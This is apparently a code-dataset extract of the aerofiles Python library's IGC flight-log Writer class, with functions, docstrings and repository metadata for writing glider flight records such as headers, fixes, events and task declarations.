raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_event(self, *args):
    """
    Write an event record::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    :param time: UTC time of the event record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    """
    # Poor man's overloading: dispatch on argument count, and for two
    # arguments on whether the first one is time-like ((time, code))
    # or not ((code, text)).  The branch order matters.
    num_args = len(args)
    if not (1 <= num_args <= 3):
        raise ValueError('Invalid number of parameters received')
    if num_args == 3:
        time, code, text = args
    elif num_args == 1:
        code = args[0]
        time = text = None
    elif isinstance(args[0], (datetime.time, datetime.datetime)):
        time, code = args
        text = None
    else:
        code, text = args
        time = None

    if time is None:
        time = datetime.datetime.utcnow()

    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')

    record = self.format_time(time)
    record += code
    if text:
        record += text

    self.write_record('E', record)
def write_satellites(self, *args):
    """
    Write a satellite constellation record::

        writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
        # -> F12345601020522

    :param time: UTC time of the satellite constellation record
        (default: :meth:`~datetime.datetime.utcnow`)
    :param satellites: a list of satellite IDs as either two-character
        strings or integers below 100
    """
    # The time argument is optional: a single positional argument is
    # just the satellite list.
    if len(args) == 1:
        time, satellites = None, args[0]
    elif len(args) == 2:
        time, satellites = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)
    for sat_id in satellites:
        # Integer IDs are zero-padded; every ID must end up exactly
        # two characters wide.
        sat_str = '%02d' % sat_id if isinstance(sat_id, int) else sat_id
        if len(sat_str) != 2:
            raise ValueError('Invalid satellite ID')
        record += sat_str

    self.write_record('F', record)
def write_k_record(self, *args):
    """
    Write a K record::

        writer.write_k_record_extensions([
            ('FXA', 3), ('SIU', 2), ('ENL', 3),
        ])

        writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
        # -> J030810FXA1112SIU1315ENL
        # -> K02030402313002

    :param time: UTC time of the k record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
    """
    # The time argument is optional: one positional argument is just
    # the extensions list, two are (time, extensions).
    num_args = len(args)
    if num_args not in (1, 2):
        raise ValueError('Invalid number of parameters received')
    if num_args == 1:
        extensions = args[0]
        time = None
    else:
        time, extensions = args

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)

    # The given values must line up with the (code, length) tuples
    # previously declared through write_k_record_extensions().
    if not (isinstance(extensions, list) and
            isinstance(self.k_record_extensions, list)):
        raise ValueError('Invalid extensions list')

    if len(extensions) != len(self.k_record_extensions):
        raise ValueError(
            'Number of extensions does not match declaration')

    for type_length, value in zip(self.k_record_extensions, extensions):
        length = type_length[1]

        # Numeric values are zero-padded to the declared field width;
        # strings are taken verbatim but must already have that width.
        if isinstance(value, (int, float)):
            value = ('%0' + str(length) + 'd') % value

        if len(value) != length:
            raise ValueError('Extension value has wrong length')

        record += value

    self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write a comment record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the
        comment (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    """
    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid source')
    self.write_record('L', '%s%s' % (code, text))
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_event | python | def write_event(self, *args):
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record) | Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L721-L767 | [
"def format_time(self, time):\n if isinstance(time, datetime.datetime):\n time = time.time()\n\n if isinstance(time, datetime.time):\n time = time.strftime('%H%M%S')\n\n if not patterns.TIME.match(time):\n raise ValueError(\"Invalid time: \" + time)\n\n return time\n",
"def write_... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write a comment record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the comment
        (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    :raises ValueError: if *code* is not a valid three-letter-code
    """
    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid source')
    self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_satellites | python | def write_satellites(self, *args):
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record) | Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100 | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L769-L806 | [
"def format_time(self, time):\n if isinstance(time, datetime.datetime):\n time = time.time()\n\n if isinstance(time, datetime.time):\n time = time.strftime('%H%M%S')\n\n if not patterns.TIME.match(time):\n raise ValueError(\"Invalid time: \" + time)\n\n return time\n",
"def write_... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
    """Convert *date* to the six-character ``DDMMYY`` form used in IGC records.

    Accepts a :class:`datetime.datetime`, a :class:`datetime.date` or an
    already-formatted string; the result is validated in all cases.

    :raises ValueError: if the resulting string is not a valid date field
    """
    # A datetime is first reduced to its date component.
    if isinstance(date, datetime.datetime):
        date = date.date()
    if isinstance(date, datetime.date):
        date = date.strftime('%d%m%y')
    # Strings (including freshly formatted ones) must match the IGC pattern.
    if not patterns.DATE.match(date):
        raise ValueError("Invalid date: " + date)
    return date
def format_time(self, time):
    """Convert *time* to the six-character ``HHMMSS`` form used in IGC records.

    Accepts a :class:`datetime.datetime`, a :class:`datetime.time` or an
    already-formatted string; the result is validated in all cases.

    :raises ValueError: if the resulting string is not a valid time field
    """
    # A datetime is first reduced to its time component.
    if isinstance(time, datetime.datetime):
        time = time.time()
    if isinstance(time, datetime.time):
        time = time.strftime('%H%M%S')
    # Strings (including freshly formatted ones) must match the IGC pattern.
    if not patterns.TIME.match(time):
        raise ValueError("Invalid time: " + time)
    return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
